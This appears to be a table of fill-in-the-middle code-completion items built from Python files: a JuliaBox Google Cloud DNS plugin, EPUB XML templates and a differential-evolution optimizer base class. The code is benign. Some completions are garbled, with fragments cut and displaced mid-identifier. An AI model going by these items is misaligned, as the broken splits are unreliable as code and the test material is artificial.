prompt
large_stringlengths 72
9.34k
| completion
large_stringlengths 0
7.61k
|
---|---|
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def configure():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def domain():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def connect():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def add_cname(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def delete_cname(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
<|fim_middle|>
<|fim▁end|> | cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name) |
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def <|fim_middle|>():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def domain():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def connect():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def add_cname(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def delete_cname(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name)
<|fim▁end|> | configure |
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def configure():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def <|fim_middle|>():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def connect():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def add_cname(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def delete_cname(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name)
<|fim▁end|> | domain |
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def configure():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def domain():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def <|fim_middle|>():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def add_cname(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def delete_cname(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name)
<|fim▁end|> | connect |
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def configure():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def domain():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def connect():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def <|fim_middle|>(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def delete_cname(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name)
<|fim▁end|> | add_cname |
<|file_name|>impl_gcd.py<|end_file_name|><|fim▁begin|>__author__ = 'Nishanth'
from juliabox.cloud import JBPluginCloud
from juliabox.jbox_util import JBoxCfg, retry_on_errors
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
import threading
class JBoxGCD(JBPluginCloud):
provides = [JBPluginCloud.JBP_DNS, JBPluginCloud.JBP_DNS_GCD]
threadlocal = threading.local()
INSTALLID = None
REGION = None
DOMAIN = None
@staticmethod
def configure():
cloud_host = JBoxCfg.get('cloud_host')
JBoxGCD.INSTALLID = cloud_host['install_id']
JBoxGCD.REGION = cloud_host['region']
JBoxGCD.DOMAIN = cloud_host['domain']
@staticmethod
def domain():
if JBoxGCD.DOMAIN is None:
JBoxGCD.configure()
return JBoxGCD.DOMAIN
@staticmethod
def connect():
c = getattr(JBoxGCD.threadlocal, 'conn', None)
if c is None:
JBoxGCD.configure()
creds = GoogleCredentials.get_application_default()
JBoxGCD.threadlocal.conn = c = build("dns", "v1", credentials=creds)
return c
@staticmethod
@retry_on_errors(retries=2)
def add_cname(name, value):
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'additions': [
{'rrdatas': [value],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': 300} ] }).execute()
@staticmethod
@retry_on_errors(retries=2)
def <|fim_middle|>(name):
resp = JBoxGCD.connect().resourceRecordSets().list(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
name=name, type='A').execute()
if len(resp['rrsets']) == 0:
JBoxGCD.log_debug('No prior dns registration found for %s', name)
else:
cname = resp['rrsets'][0]['rrdatas'][0]
ttl = resp['rrsets'][0]['ttl']
JBoxGCD.connect().changes().create(
project=JBoxGCD.INSTALLID, managedZone=JBoxGCD.REGION,
body={'kind': 'dns#change',
'deletions': [
{'rrdatas': [str(cname)],
'kind': 'dns#resourceRecordSet',
'type': 'A',
'name': name,
'ttl': ttl} ] }).execute()
JBoxGCD.log_warn('Prior dns registration was found for %s', name)
<|fim▁end|> | delete_cname |
<|file_name|>templates.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# -*- coding: utf-8 -*-
#--------------------------------------------------------------------
# Copyright (c) 2014 Eren Inan Canpolat
# Author: Eren Inan Canpolat <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#--------------------------------------------------------------------
content_template = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
</head>
<body><|fim▁hole|><!DOCTYPE ncx PUBLIC "-//NISO//DTD ncx 2005-1//EN"
"http://www.daisy.org/z3986/2005/ncx-2005-1.dtd">
<ncx xmlns="http://www.daisy.org/z3986/2005/ncx/" version="2005-1">
<head>
<meta name="dtb:uid" content="{book.uuid}" />
<meta name="dtb:depth" content="{book.toc_root.maxlevel}" />
<meta name="dtb:totalPageCount" content="0" />
<meta name="dtb:maxPageNumber" content="0" />
</head>
<docTitle>
<text>{book.title}</text>
</docTitle>
{navmap}
</ncx>"""
container_xml = """<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<container xmlns="urn:oasis:names:tc:opendocument:xmlns:container" version="1.0">
<rootfiles>
<rootfile full-path="OEBPS/content.opf" media-type="application/oebps-package+xml"/>
</rootfiles>
</container>
"""<|fim▁end|> | </body>
</html>"""
toc_ncx = u"""<?xml version="1.0" encoding="utf-8"?> |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции<|fim▁hole|> func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list<|fim▁end|> | |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
<|fim_middle|>
<|fim▁end|> | amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
|
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
<|fim_middle|>
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter' |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
<|fim_middle|>
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | self.amount_of_individuals = amount_of_individuals |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
<|fim_middle|>
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | self.f = f
self.p = p |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
<|fim_middle|>
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | self.end_method = end_method |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
<|fim_middle|>
_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index<|fim_middle|>
imize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def opt |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, de<|fim_middle|>
rint=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | bug_pop_p |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return<|fim_middle|>
t_list
<|fim▁end|> | self.cos |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim_middle|>
<|fim▁end|> | |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def <|fim_middle|>(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | __init__ |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def <|fim_middle|>(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | set_amount_of_individuals |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def <|fim_middle|>(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | set_params |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
